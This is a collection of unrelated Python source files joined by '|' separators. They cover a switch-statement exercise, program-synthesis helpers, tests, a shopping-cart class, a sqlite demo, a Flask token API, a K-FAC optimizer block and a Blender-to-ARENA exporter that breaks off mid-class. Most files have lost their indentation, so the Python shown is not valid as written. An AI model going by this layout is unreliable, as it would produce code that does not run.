#!/usr/bin/env python3
# switch.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
print('this is the switch.py file')
# Equivalent to case/switch statements
choices = dict(
one = 'first',
two = 'second',
three = 'third',
four = 'fourth',
five = 'fifth'
)
# Find value for specific key
v = 'three'
print(choices[v])
# When you want a 'default'
x = 'seven'
print(choices.get(x, 'other'))
if __name__ == "__main__": main()
|
import json, pickle, time, copy
from Louis.ARC_data.objects import *
from program import *
def pickle_read(filename):
with open(filename, 'rb') as f:
ret = pickle.load(f)
return ret
def pickle_write(filename, data):
with open(filename, 'wb') as f:
pickle.dump(data, f)
def json_read(filename):
with open(filename, 'r') as f:
ret = json.load(f)
return ret
def json_write(filename, data):
with open(filename, 'w') as f:
json.dump(data, f)
def speed_test(generator, steps, show=False):
start = time.time()
for _ in range(steps):
p = next(generator)
if show: print(p)
print(time.time() - start)
def empty_grid_obj_overlap(objects):
empty = True
points = set()
for obj in objects:
x, y = obj.low
for i, j, c in obj.points:
if c != 0 and 0 <= i + x < 30 and 0 <= j + y < 30:
if (i + x, j + y) in points: raise Exception('Objects overlap')
points.add((i + x, j + y))
empty = False
if empty: raise Exception('Empty grid')
def try_pb_p(dsl, p, pb):
for mode in pb:
for pair in pb[mode]:
objects, _, _ = pair['input']
res = p.eval_naive(dsl, (copy.deepcopy(objects), None))
if res == objects: raise Exception('Identity program')
empty_grid_obj_overlap(res)
pair['output'] = res
constant = True
l = [pair['output'] for mode in pb for pair in pb[mode]]
for objects1 in l:
for objects2 in l:
if objects1 != objects2: constant = False
if constant: raise Exception('Constant program')
def pb_to_grid(pb):
for mode in pb:
for pair in pb[mode]:
objects, n, m = pair['input']
pair['input'] = objects_to_grid(objects, n, m)
try: pair['output'] = objects_to_grid(pair['output'], n, m, supple=True)
except: pair['output'] = [[]]
def appear_var(p):
if isinstance(p, Variable): return True
if isinstance(p, Lambda): return appear_var(p.body)
if isinstance(p, Function): return appear_var(p.function) or any(appear_var(arg) for arg in p.arguments)
return False
def scan_sanity(p):
if isinstance(p, Function):
if isinstance(p.function, BasicPrimitive):
if p.function.primitive == 'if':
if not appear_var(p.arguments[0]): return False
if len(p.arguments) > 2 and p.arguments[1] == p.arguments[2]: return False
if p.function.primitive == 'eq?' and len(p.arguments) > 1 and p.arguments[0] == p.arguments[1]: return False
            if p.function.primitive == 'car' and p.arguments != [] and isinstance(p.arguments[0], Function) and isinstance(p.arguments[0].function, BasicPrimitive) and (p.arguments[0].function.primitive == 'singleton' or p.arguments[0].function.primitive == 'cons'): return False
return scan_sanity(p.function) and all(scan_sanity(arg) for arg in p.arguments)
return True
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from gaiatest import GaiaTestCase
from gaiatest.apps.system.regions.cards_view import CardsView
from gaiatest.apps.system.app import System
class TestCardsViewStatusbarVisibilityAccessibility(GaiaTestCase):
def setUp(self):
GaiaTestCase.setUp(self)
self.apps.launch('Calendar')
# Switch to top level frame before starting the test
self.marionette.switch_to_frame()
def test_a11y_cards_view_status_bar_visibility(self):
cards_view = CardsView(self.marionette)
status_bar = System(self.marionette).status_bar
# Pull up the cards view
self.device.hold_home_button()
cards_view.wait_for_cards_view()
# Wait for the app card ready
cards_view.wait_for_card_ready('Calendar')
# Statusbar icons should be invisible to the screen reader.
self.wait_for_condition(lambda m: status_bar.is_status_bar_maximized_wrapper_a11y_hidden)
self.wait_for_condition(lambda m: status_bar.is_status_bar_minimized_wrapper_a11y_hidden)
|
from src.cart import CartProduct
from src.product.products import Product
class Client(object):
def __init__(self, name, wallet=None):
"""
Supermarket client
>>> wilson = Client(name='Wilson', wallet=10.00)
>>> sweet_potato = Product(name='sweet_potato', sku='001', price=1.00, cost=0.50, stock_quantity=100, unit='Kg')
>>> cart_sweet_potato = CartProduct(product=sweet_potato, quantity=1)
        >>> wilson.add_product_to_cart(sweet_potato, 1)
>>> wilson.pay()
"""
self.name: str = name
self.cart: set = set()
self.wallet: float = wallet
@staticmethod
def _create_cart_product(added_product: Product, added_quantity: int) -> CartProduct:
"""
Creates a cart product with given product and quantity
:param added_product: Product that will be used to create the cart product
:param added_quantity: Quantity of the product
:return: Cart product
"""
return CartProduct(product=added_product, quantity=added_quantity)
def _search_product(self, product: Product) -> CartProduct:
"""Searches the cart for the given product"""
for cart_product in self.cart:
if cart_product.product == product:
return cart_product
def add_product_to_cart(self, added_product: Product, added_quantity: int):
"""Adds a given product to client cart"""
cart_product = self._search_product(added_product)
if cart_product:
cart_product.increase_quantity(added_quantity=added_quantity)
else:
cart_product = self._create_cart_product(added_product, added_quantity)
self.cart.add(cart_product)
def remove_product_from_cart(self, product: Product, removed_quantity: int):
cart_product = self._search_product(product)
if removed_quantity == cart_product.quantity:
self.cart.remove(cart_product)
cart_product.restore_item_to_stock(removed_quantity)
@staticmethod
def _handle_bundle_price(total_price: float, cart_product: CartProduct) -> float:
not_in_bundle_quantity = cart_product.quantity % cart_product.product.bundle_discount.bundle_quantity
bundle_products_quantity = cart_product.quantity // cart_product.product.bundle_discount.bundle_quantity
total_price += ((cart_product.product.price * not_in_bundle_quantity) +
(cart_product.product.bundle_discount.bundle_price *
bundle_products_quantity *
cart_product.product.bundle_discount.bundle_quantity))
return total_price
def _calculate_cart_price(self) -> float:
"""Calculates the cart total value"""
total_price = 0
for cart_product in self.cart:
if cart_product.product.bundle_discount:
total_price = self._handle_bundle_price(total_price, cart_product)
else:
total_price += (cart_product.product.price * cart_product.quantity)
return total_price
def pay(self):
"""
Pays for the cart total value
:raises Exception: When the client has no money
"""
total_price = self._calculate_cart_price()
if total_price > self.wallet:
raise Exception('Not enough money in the wallet!')
self.wallet -= total_price
|
import sqlite3
# form connection to 'demo_data' sqlite3 db
conn = sqlite3.connect('demo_data.sqlite3')
# create cursor
curs = conn.cursor()
# set schema for the 'demo' table
create_demo_table = ("""
CREATE TABLE demo (
s CHAR(1),
x INT,
y INT
)
""")
# create the table in demo_data db
curs.execute(create_demo_table)
# insert data into the 'demo' table
insert_data = """
INSERT INTO demo (s, x, y)
VALUES ('g', 3, 9), ('v', 5, 7), ('f', 8, 7);
"""
curs.execute(insert_data)
# save changes
conn.commit()
## test queries to make sure that everything worked
#how many rows? - 3
test_1 = ("SELECT COUNT(*) FROM demo")
print("How many rows?: ", curs.execute(test_1).fetchone())
#How many rows are there where both x and y are at least 5?
test_2 = ("SELECT COUNT(*) FROM demo WHERE x >= 5 AND y >= 5")
print("How many rows where 'x' and 'y' at least 5: ", curs.execute(test_2).fetchone())
#How many unique values of y are there (hint - COUNT() can accept
#a keyword DISTINCT)?
test_3 = ("SELECT COUNT(DISTINCT y) FROM demo")
print("How many distinct 'y'?: ", curs.execute(test_3).fetchone())
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import time
import sys
import paddle
import paddle.fluid as fluid
#import reader_cv2 as reader
import reader as reader
import argparse
import functools
from utility import add_arguments, print_arguments
import math
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('pretrained_model', str, None, "Whether to use pretrained model.")
add_arg('saved_model', str, "new_model", "Where saved model.")
add_arg('model', str, "SE_ResNeXt50_32x4d", "Set the network to use.")
add_arg('model_category', str, "models_name", "Whether to use models_name or not, valid value:'models','models_name'." )
# yapf: enable
def set_models(model_category):
global models
assert model_category in ["models", "models_name"
], "{} is not in lists: {}".format(
model_category, ["models", "models_name"])
if model_category == "models_name":
import models_name as models
else:
import models as models
def save(args):
# parameters from arguments
class_dim = 1000
model_name = args.model
pretrained_model = args.pretrained_model
with_memory_optimization = True
image_shape = [3,224,224]
model_list = [m for m in dir(models) if "__" not in m]
assert model_name in model_list, "{} is not in lists: {}".format(args.model,
model_list)
image = fluid.layers.data(name='image', shape=image_shape, dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
# model definition
model = models.__dict__[model_name]()
if model_name == "GoogleNet":
out0, out1, out2 = model.net(input=image, class_dim=class_dim)
cost0 = fluid.layers.cross_entropy(input=out0, label=label)
cost1 = fluid.layers.cross_entropy(input=out1, label=label)
cost2 = fluid.layers.cross_entropy(input=out2, label=label)
avg_cost0 = fluid.layers.mean(x=cost0)
avg_cost1 = fluid.layers.mean(x=cost1)
avg_cost2 = fluid.layers.mean(x=cost2)
avg_cost = avg_cost0 + 0.3 * avg_cost1 + 0.3 * avg_cost2
acc_top1 = fluid.layers.accuracy(input=out0, label=label, k=1)
acc_top5 = fluid.layers.accuracy(input=out0, label=label, k=5)
else:
out = model.net(input=image, class_dim=class_dim)
cost, pred = fluid.layers.softmax_with_cross_entropy(
out, label, return_softmax=True)
avg_cost = fluid.layers.mean(x=cost)
acc_top1 = fluid.layers.accuracy(input=pred, label=label, k=1)
acc_top5 = fluid.layers.accuracy(input=pred, label=label, k=5)
test_program = fluid.default_main_program().clone(for_test=True)
fetch_list = [avg_cost.name, acc_top1.name, acc_top5.name]
if with_memory_optimization:
fluid.memory_optimize(
fluid.default_main_program(), skip_opt_set=set(fetch_list))
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
if pretrained_model:
def if_exist(var):
return os.path.exists(os.path.join(pretrained_model, var.name))
fluid.io.load_vars(exe, pretrained_model, predicate=if_exist)
val_reader = paddle.batch(reader.val(), batch_size=1)
feeder = fluid.DataFeeder(place=place, feed_list=[image, label])
fluid.io.save_inference_model(args.saved_model, ['image', 'label'], [test_program.current_block().var(i) for i in fetch_list], exe, test_program)
print("Save done.")
def main():
args = parser.parse_args()
print_arguments(args)
set_models(args.model_category)
save(args)
if __name__ == '__main__':
main()
|
import os
from http import HTTPStatus
from flask import request
from flask_cors import cross_origin
from app.controllers.hodler import HodlerController
from app.controllers.token import TokenController
from app.controllers.watcher import WatcherController
from app.tasks.blockchain import (
blockchain_events_sync_all_contracts,
blockchain_events_sync_one_contract,
)
from app.utils.session import SessionManager
from flask_app import app
db_uri = os.environ.get('DATABASE_URL', None)
if not db_uri:
app.logger.error('DATABASE_URL is not set')
SessionManager.configure(db_uri)
@app.route('/api/tokens', methods=['POST'])
@cross_origin()
def create_tokens():
payload = request.json
app.logger.info(f'Token Creation Request: {payload["name"]}')
token_ctl = TokenController()
token_ctl.create_token(payload)
return {'code': HTTPStatus.CREATED}
@app.route('/api/tokens/edit', methods=['POST'])
@cross_origin()
def update_token():
payload = request.json
token_ctl = TokenController()
token_ctl.edit_token(payload)
return {'code': HTTPStatus.OK}
@app.route('/api/hodlers', methods=['GET'])
@cross_origin()
def get_top_hodlers():
token_name = request.args.get('token')
limit = int(request.args.get('limit', 100))
hodler_ctl = HodlerController()
hodlers = hodler_ctl.find_top_hodler_by_token_name(token_name, limit)
return {'code': HTTPStatus.OK, 'hodlers': hodlers}
@app.route('/api/tokens', methods=['GET'])
@cross_origin()
def get_tokens():
token_ctl = TokenController()
tokens = token_ctl.get_tokens()
return {'code': HTTPStatus.OK, 'tokens': [token.to_dict() for token in tokens]}
@app.route('/api/blockchain_sync', methods=['POST'])
@cross_origin()
def blockchain_sync():
blockchain_events_sync_all_contracts.apply()
return {'code': HTTPStatus.ACCEPTED}
@app.route('/api/watchers', methods=['POST'])
@cross_origin()
def upsert_watcher():
payload = request.json
app.logger.info(f'Watcher Upsert Request: {payload["address"]}')
watcher_ctl = WatcherController()
watcher_ctl.upsert_watcher(payload)
return {'code': HTTPStatus.CREATED}
@app.route('/api/tokens/sync', methods=['POST'])
@cross_origin()
def sync_token():
payload = request.json
token_ctl = TokenController()
token = token_ctl.get_token_by_name(payload['name'])
blockchain_events_sync_one_contract.apply(args=[token.to_dict()])
return {'code': HTTPStatus.ACCEPTED}
if __name__ == '__main__':
app.run()
|
import json
import logging
import mongoengine as me
import rmc.shared.util as util
class AggregateRating(me.EmbeddedDocument):
rating = me.FloatField(min_value=0.0, max_value=1.0, default=0.0)
count = me.IntField(min_value=0, default=0)
sorting_score_positive = me.FloatField(
min_value=0.0, max_value=1.0, default=0.0)
sorting_score_negative = me.FloatField(
min_value=0.0, max_value=1.0, default=0.0)
def debug_logging(self, func_name):
# TODO(Sandy): Temporary debugging for over 100% average rating bug
if self.rating > 1:
logging.warn(
"%s: update_sorting_score will fail" % (func_name) +
" self.count=%s self.rating=%s" % (self.count, self.rating)
)
@property
def num_approves(self):
"""Returns the number of users who selected "yes" for this rating."""
return int(round(self.rating * self.count))
def update_sorting_score(self):
self.sorting_score_positive = util.get_sorting_score(
self.rating, self.count)
self.sorting_score_negative = util.get_sorting_score(
1 - self.rating, self.count)
def add_rating(self, rating):
self.rating = float(self.num_approves + rating) / (self.count + 1)
self.count += 1
# TODO(Sandy): Temporary debugging
self.debug_logging("add_rating(%s)" % (rating))
self.update_sorting_score()
def remove_rating(self, rating):
if self.count == 0:
logging.warn(
"AggregateRating: called remove_rating with count = 0")
return
if self.count == 1:
self.rating = 0.0
else:
self.rating = float(self.num_approves - rating) / (self.count - 1)
self.count -= 1
# TODO(Sandy): Temporary debugging
self.debug_logging("remove_rating(%s)" % (rating))
self.update_sorting_score()
def add_aggregate_rating(self, ar):
if ar.count == 0:
return
total = ar.rating * ar.count
self.rating = (float(self.num_approves + total) /
(self.count + ar.count))
self.count += ar.count
# TODO(Sandy): Temporary debugging
self.debug_logging("add_aggregate_rating(%s)" % (ar))
self.update_sorting_score()
def to_dict(self):
return {
'rating': self.rating,
'count': self.count,
}
def to_json(self):
return json.dumps(self.to_dict())
def update_aggregate_after_replacement(self, old_value, new_value):
if old_value is None and new_value is None:
# Rating not changed
pass
elif old_value is None:
# New rating, add new_value to the aggregate
self.add_rating(new_value)
elif new_value is None:
# Removed a rating, remove old_value from the aggregate
self.remove_rating(old_value)
elif old_value != new_value:
# Modified a rating, removing old_value and add new_value to the
# aggregate
self.remove_rating(old_value)
self.add_rating(new_value)
@classmethod
def from_json(cls, json_str):
obj = json.loads(json_str)
return cls(**obj)
# TODO(david): Does not make sense to make aggregate rating from one rating
@classmethod
def from_single_rating(cls, value):
return cls(rating=value, count=1)
def get_overall_rating(ar_ratings):
sum_ratings = sum(r['rating'] * r['count'] for r in ar_ratings)
num_ratings = sum(r['count'] for r in ar_ratings)
return AggregateRating(
count=max(r['count'] for r in ar_ratings) if ar_ratings else 0,
rating=sum_ratings / max(num_ratings, 1),
)
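# Illustrative (hypothetical) usage of get_overall_rating, assuming dict-style
# ratings as produced by AggregateRating.to_dict():
#   get_overall_rating([{'rating': 1.0, 'count': 2}, {'rating': 0.5, 'count': 2}])
#   returns AggregateRating(count=2, rating=0.75), since (1.0*2 + 0.5*2) / 4 == 0.75.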
|
# pylint: disable=invalid-name,no-self-use
import json
import os
import numpy
from numpy.testing import assert_almost_equal
from deep_qa.run import compute_accuracy
from deep_qa.run import run_model_from_file, load_model, evaluate_model
from deep_qa.run import score_dataset, score_dataset_with_ensemble
from deep_qa.testing.test_case import DeepQaTestCase
class TestRun(DeepQaTestCase):
# Our point here is mostly just to make sure the scripts don't crash.
def setUp(self):
super(TestRun, self).setUp()
self.write_true_false_model_files()
model_params = self.get_model_params({"model_class": "ClassificationModel",
'save_models': True})
self.param_path = os.path.join(self.TEST_DIR, "params.json")
with open(self.param_path, "w") as file_path:
json.dump(model_params.as_dict(), file_path)
def test_run_model_does_not_crash(self):
run_model_from_file(self.param_path)
def test_load_model_does_not_crash(self):
run_model_from_file(self.param_path)
loaded_model = load_model(self.param_path)
assert loaded_model.can_train()
def test_score_dataset_does_not_crash(self):
run_model_from_file(self.param_path)
score_dataset(self.param_path, [self.TEST_FILE])
    def test_evaluate_model_does_not_crash(self):
run_model_from_file(self.param_path)
evaluate_model(self.param_path, [self.TEST_FILE])
def test_score_dataset_with_ensemble_gives_same_predictions_as_score_dataset(self):
# We're just going to test something simple here: that the methods don't crash, and that we
# get the same result with an ensemble of one model that we do with `score_dataset`.
run_model_from_file(self.param_path)
predictions, _ = score_dataset(self.param_path, [self.TEST_FILE])
ensembled_predictions, _ = score_dataset_with_ensemble([self.param_path], [self.TEST_FILE])
assert_almost_equal(predictions, ensembled_predictions)
def test_compute_accuracy_computes_a_correct_metric(self):
predictions = numpy.asarray([[.5, .5, .6], [.1, .4, .0]])
labels = numpy.asarray([[1, 0, 0], [0, 1, 0]])
assert compute_accuracy(predictions, labels) == .5
|
#!/usr/bin/env python
"""
MySQL implementation of GetChecksum
"""
from WMCore.Database.DBFormatter import DBFormatter
class GetChecksum(DBFormatter):
sql = """SELECT cst.type AS cktype, fcs.cksum AS cksum FROM
wmbs_file_checksums fcs INNER JOIN
wmbs_checksum_type cst
ON fcs.typeid = cst.id
WHERE fcs.fileid = :fileid"""
def formatResult(self, result):
"""
I need the result in a reasonable list.
This will return None if there is no cksum
"""
formattedResult = {}
dictVersion = DBFormatter.formatDict(self, result)
if type(dictVersion) == type([]):
if len(dictVersion) == 0:
#Then it's empty
return None
else:
#Otherwise there are several, and we have to record each one
#I don't know how to do this yet.
tmpDict = {}
for entry in dictVersion:
tmpDict.update({entry.get('cktype', 'Default'): entry.get('cksum', None)})
formattedResult['checksums'] = tmpDict
else:
formattedResult['checksums'] = {'Default': dictVersion.get('cksum', None)}
        if formattedResult.get('checksums') == {'Default': None}:
#Then the thing was empty anyway
return None
return formattedResult
def execute(self, fileid = None, bulkList = None, conn = None, transaction = False):
if bulkList:
#Would need to accept a bulk list of form [{fileid: fileid}]
binds = bulkList
else:
binds = {'fileid': fileid}
result = self.dbi.processData(self.sql, binds,
conn = conn, transaction = transaction)
return self.formatResult(result)
|
from nose.tools import (
eq_,
set_trace,
)
from ...util.web_publication_manifest import (
JSONable,
Manifest,
AudiobookManifest,
)
from .. import DatabaseTest
class TestJSONable(object):
class Mock(JSONable):
@property
def as_dict(self):
return dict(value=1)
def test_as_dict(self):
eq_(u'{"value": 1}', unicode(self.Mock()))
def test_json_ready(self):
m = JSONable.json_ready
eq_(1, m(1))
mock = self.Mock()
eq_(dict(value=1), m(mock))
eq_([dict(value=1), dict(value=1)], m([mock, mock]))
class TestManifest(object):
def test_defaults(self):
eq_("http://schema.org/Book", Manifest.DEFAULT_TYPE)
eq_("http://readium.org/webpub/default.jsonld",
Manifest.DEFAULT_CONTEXT)
manifest = Manifest()
eq_(Manifest.DEFAULT_CONTEXT, manifest.context)
eq_(Manifest.DEFAULT_TYPE, manifest.type)
eq_(
{
'@context' : manifest.context,
'metadata' : {'@type': manifest.type}
},
manifest.as_dict
)
def test_add_link(self):
manifest = Manifest()
manifest.add_link("http://foo/", "self", extra="value")
dict = manifest.as_dict
eq_(
[{'href': 'http://foo/', 'rel': 'self', 'extra': 'value'}],
dict['links']
)
def test_add_reading_order(self):
manifest = Manifest()
manifest.add_reading_order("http://foo/", "text/html", "Chapter 1",
extra="value")
dict = manifest.as_dict
eq_(
[{'href': 'http://foo/', 'type': 'text/html', 'title': 'Chapter 1',
'extra': 'value'}],
dict['readingOrder']
)
def test_add_resource(self):
manifest = Manifest()
manifest.add_resource("http://foo/", "text/html", extra="value")
dict = manifest.as_dict
eq_(
[{'href': 'http://foo/', 'type': 'text/html', 'extra': 'value'}],
dict['resources']
)
def test_null_properties_not_propagated(self):
manifest = Manifest()
additional_properties = dict(extra="value", missing=None)
manifest.add_link("http://foo/", "self", **additional_properties)
manifest.add_reading_order("http://foo/", "text/html", "Chapter 1", **additional_properties)
manifest.add_resource("http://foo/", "text/html", **additional_properties)
manifest_dict = manifest.as_dict
top_level_properties = ["links", "readingOrder", "resources"]
for prop in top_level_properties:
            [entry] = manifest_dict[prop]
assert "extra" in entry
eq_("value", entry["extra"])
assert "missing" not in entry
class TestUpdateBibliographicMetadata(DatabaseTest):
def test_update(self):
edition, pool = self._edition(with_license_pool=True)
edition.cover_thumbnail_url = self._url
[author] = edition.contributors
manifest = Manifest()
manifest.update_bibliographic_metadata(pool)
metadata = manifest.metadata
eq_(edition.title, metadata['title'])
eq_(pool.identifier.urn, metadata['identifier'])
# The author's sort name is used because they have no display
# name.
eq_([author.sort_name], metadata['author'])
        # The language has been converted from a three-letter ISO 639-2 code
        # to a two-letter ISO 639-1 code.
eq_("en", metadata['language'])
[cover_link] = manifest.links
eq_('cover', cover_link['rel'])
eq_(edition.cover_thumbnail_url, cover_link['href'])
# Add an author's display name, and it is used in preference
# to the sort name.
author.display_name = "a display name"
manifest = Manifest()
manifest.update_bibliographic_metadata(pool)
eq_(["a display name"], manifest.metadata['author'])
# If the pool has no presentation edition, the only information
# we get is the identifier.
pool.presentation_edition = None
manifest = Manifest()
manifest.update_bibliographic_metadata(pool)
        eq_(pool.identifier.urn, manifest.metadata['identifier'])
for missing in ['title', 'language', 'author']:
assert missing not in manifest.metadata
eq_([], manifest.links)
class TestAudiobookManifest(object):
def test_defaults(self):
eq_("http://bib.schema.org/Audiobook", AudiobookManifest.DEFAULT_TYPE)
eq_("http://readium.org/webpub/default.jsonld",
AudiobookManifest.DEFAULT_CONTEXT)
manifest = AudiobookManifest()
eq_(AudiobookManifest.DEFAULT_CONTEXT, manifest.context)
eq_(AudiobookManifest.DEFAULT_TYPE, manifest.type)
eq_(
{
'@context' : manifest.context,
'metadata' : {'@type': manifest.type}
},
manifest.as_dict
)
|
def get_type(value):
try:
int(value)
return "int"
except ValueError:
try:
float(value)
return "float"
except ValueError:
return "string"
if __name__ == '__main__':
input_value = input("Enter value: ")
print(get_type(input_value))
input_value = input("Enter value: ")
print(get_type(input_value))
input_value = input("Enter value: ")
print(get_type(input_value))
|
# -*- coding: utf-8 -*-
"""Runs various benchmarks on the Yaklient package"""
|
class Car:
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
        self.odometer_reading = 0  # default instance attribute
    def get_describe_name(self):
        """
        Return the car's basic descriptive information.
        :return: long_name
        """
        long_name = f"{self.year} {self.make} {self.model}"
        return long_name.title()
    def print_odometer(self):
        """
        Print the car's mileage.
        :return: none
        """
        print(f"This car has {self.odometer_reading} miles on it")
    def update_odometer(self, new_mile):
        """
        Called from outside; after the value is validated, set the new mileage.
        :param new_mile: the new mileage
        :return: none
        """
        if new_mile >= self.odometer_reading:
            self.odometer_reading = new_mile  # modify the instance attribute through a method
        else:
            print("You cannot roll back an odometer!")
def fill_gas_tank(self):
print("your gas tank has been filled.")
# Inheritance: create a subclass
class ElectricCar(Car):
    def __init__(self, make, model, year, remaining_battery):
        """
        Inherit the instance attributes and methods of the parent class Car.
        :param make:
        :param model:
        :param year:
        """
        super().__init__(make, model, year)  # all parent instance attributes and methods are inherited
        self.battery_size = 70  # default subclass instance attribute
        self.remaining_battery = remaining_battery  # subclass-specific instance attribute
    def describe_battery(self):
        """
        Subclass method: print the battery capacity.
        :return: none
        """
        print(f"This car has a {self.battery_size} -kWh battery")
    def read_remaining_battery(self):
        """
        Subclass method: print the remaining battery charge.
        :return: none
        """
        print(f"This car has {self.remaining_battery} % battery left")
    def fill_gas_tank(self):  # override the parent method
print("Electric car doesn't have gas tank!")
my_tesla = ElectricCar('tesla', 'ModelX', 2020, 90)
print(my_tesla.get_describe_name())  # call a parent-class method
my_tesla.update_odometer(13000)  # call a parent-class method
my_tesla.print_odometer()  # call a parent-class method
my_tesla.describe_battery()  # call a subclass method
my_tesla.read_remaining_battery()  # call a subclass method
my_tesla.fill_gas_tank()  # call the overridden parent method
|
from chainer.backends import cuda
from chainerkfac.optimizers.fisher_block import compute_pi
from chainerkfac.optimizers.fisher_block import FisherBlock
class FisherBlockConnection(FisherBlock):
def __init__(self, *args, **kwargs):
self._A = None
self._G = None
super(FisherBlockConnection, self).__init__(*args, **kwargs)
@property
def cov_forward(self):
return self.covs[0]
@property
def cov_backward(self):
return self.covs[1]
@property
def inv_forward(self):
return self.invs[0]
@property
def inv_backward(self):
return self.invs[1]
def is_mine(self, func, in_data, out_grad_data=None):
if not isinstance(func, self.funcclass):
return False
if in_data[1] is not self.link.W.data:
return False
return True
def forward_postprocess(self, func, in_data):
self._A = self.compute_A(in_data)
self.covs = [self._A, self._G]
def backward_preprocess(self, func, in_data, out_grad_data):
self._G = self.compute_G(in_data, out_grad_data)
self.covs = [self._A, self._G]
def compute_A(self, in_data):
raise NotImplementedError
def compute_G(self, in_data, out_grad_data):
raise NotImplementedError
def update_kfgrads(self):
self.check_attr('invs')
W = self.link.W
b = self.link.b
invs = self.invs
kfgrads = self.compute_kfgrads(W, b, invs)
if b is not None:
W.kfgrad = kfgrads[:, :-1].reshape(W.shape)
b.kfgrad = kfgrads[:, -1].reshape(b.shape)
else:
W.kfgrad = kfgrads.reshape(W.shape)
def compute_kfgrads(self, W, b, invs):
raise NotImplementedError
def get_diagvals(self):
A, G = self.cov_emas
xp = cuda.get_array_module(A)
rW = self.get_diagval('W') ** 0.5
diagvalsA = rW * xp.ones(A.shape[0])
diagvalsG = rW * xp.ones(G.shape[0])
if self.link.b is not None:
diagvalsA[-1] = rW
pi = compute_pi(A, G, self._pi_type)
setattr(self, 'diag_val_forward', pi * rW)
setattr(self, 'diag_val_backward', (1 / pi) * rW)
return [pi * diagvalsA, (1 / pi) * diagvalsG]
|
from bpy_extras.io_utils import ExportHelper
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
import bpy
import os
import re
import uuid
import mathutils
import json
bl_info = {
"name": "Export to ARENA (to folder)",
"author": "Nuno Pereira",
"version": (0, 1, 2),
"blender": (2, 93, 5),
"location": "File > Export > ARENA Scene (to folder)",
"description": "Export > ARENA Scene (to folder)",
"warning": "",
"category": "Import-Export"
}
def export_arena_scene(context, scene_id, filepath, arena_username, arena_realm, filestore_path, check_existing, export_format, export_selection, export_animations, export_extras, export_draco_mesh_compression_enable):
print("export... ", filepath)
gltf_ext = 'gltf'
if export_format == 'GLB': gltf_ext = 'glb'
export_objs = []
if export_selection:
export_objs = [obj for obj in bpy.context.selected_objects if obj.parent == None]
else:
export_objs = [obj for obj in bpy.context.scene.collection.all_objects if obj.parent == None]
# save file
if bpy.data.filepath:
bpy.ops.wm.save_as_mainfile(filepath=bpy.data.filepath)
arena_objects = []
# iterate collections
for obj in export_objs:
obj_name = re.sub('_+', '_', re.sub('\W', '_', obj.name).lower())
gltf_filepath = os.path.join(filepath, obj_name)
print("export... ", gltf_filepath)
# clear selected objects
bpy.ops.object.select_all(action='DESELECT')
# select object hierarchy
for cobj in obj.children: cobj.select_set(True)
obj.select_set(True)
obj.rotation_mode = 'QUATERNION'
# save location and rotation and move object to origin
saved_loc = obj.matrix_world.to_translation()
saved_rot = obj.matrix_world.to_quaternion()
obj.location = (0, 0, 0)
obj.rotation_quaternion = (1, 0, 0, 0)
bpy.ops.export_scene.gltf(
filepath=gltf_filepath,
check_existing=check_existing,
export_format=export_format,
export_animations=export_animations,
export_extras=export_extras,
export_draco_mesh_compression_enable=export_draco_mesh_compression_enable,
use_selection = True,
)
obj.location = saved_loc
obj.rotation_quaternion = saved_rot
arena_objects.append({
"namespace": arena_username,
"realm": arena_realm,
"sceneId": scene_id,
"object_id": f'be_{scene_id}_{obj_name}',
"persist": True,
"type": "object",
"action": "create",
"attributes": {
"object_type": "gltf-model",
"url": f'/store/users/{arena_username}/blender-exports/{scene_id}/{obj_name}.{gltf_ext}',
"position": {
"x": saved_loc[0],
"y": saved_loc[2],
"z": saved_loc[1] * -1
},
"rotation": {
"x": saved_rot[1],
"y": saved_rot[3],
"z": saved_rot[2] * -1,
"w": saved_rot[0]
},
"scale": {
"x": 1,
"y": 1,
"z": 1
}
}
})
msg = f'Copy folder ({filepath}) to the ARENA filestore at {filestore_path}/{scene_id})'
show_message_box(title="ARENA Export", icon='INFO', lines=("ARENA Scene Exported",msg))
context.workspace.status_text_set(f'ARENA Scene Exported. NOTE: {msg}')
json_filepath = os.path.join(filepath, 'scene.json')
f = open(json_filepath, 'w', encoding='utf-8')
f.write(json.dumps(arena_objects))
f.close()
return {'FINISHED'}
def username_update(self, context):
self.filestore_path=f'/store/user/{self.arena_username}/blender-exports'
class ExportARENAScene(Operator, ExportHelper):
"""This appears in the tooltip of the operator and in the generated docs"""
bl_idname = "export_arena.scene"
bl_label = "Export to Folder"
bl_options = {'UNDO'}
filename_ext = ''
# List of operator properties
export_format: EnumProperty(
name="Format",
description="Choose Asset Format",
items=(
('GLB', "GLB", "GLB"),
('GLTF_EMBEDDED', "GLTF Embedded", "GLTF Embedded"),
('GLTF_SEPARATE', "GLTF Seperate", "GLTF Seperate"),
),
default='GLB',
)
arena_username: StringProperty(
name="ARENA Username",
description="ARENA Username; Used for the filestore path below (assets uploaded to the filestore)",
default='wiselab',
maxlen=100,
update=username_update
)
arena_realm: StringProperty(
name="ARENA Realm",
description="ARENA Realm; Used to create the json file",
default='realm',
maxlen=100
)
export_selection: BoolProperty(
name="Export Selection",
description="Export selected objects only",
default=False,
)
export_animations: BoolProperty(
name="Export Animations",
description="Exports active actions and NLA tracks as glTF animations",
default=True,
)
export_extras: BoolProperty(
name="Export Extras",
description="Export custom properties as glTF extras",
default=True,
)
export_draco_mesh_compression_enable: BoolProperty(
name="Draco Compression",
description="Compress mesh using Draco",
default=False,
)
filestore_path: StringProperty(
name="Filestore Path",
description="ARENA filestore path to where assets will be uploaded (defaults to <filestore-home>/blender-exports)",
default='/store/user/wiselab/blender-exports',
maxlen=300
)
def execute(self, context):
create_folder_if_does_not_exist(self.filepath)
self.scene_id = os.path.basename(self.filepath)
return export_arena_scene(
context,
self.scene_id,
self.filepath,
self.arena_username,
self.arena_realm,
self.filestore_path,
self.check_existing,
self.export_format,
self.export_selection,
self.export_animations,
self.export_extras,
self.export_draco_mesh_compression_enable
)
def invoke(self, context, event):
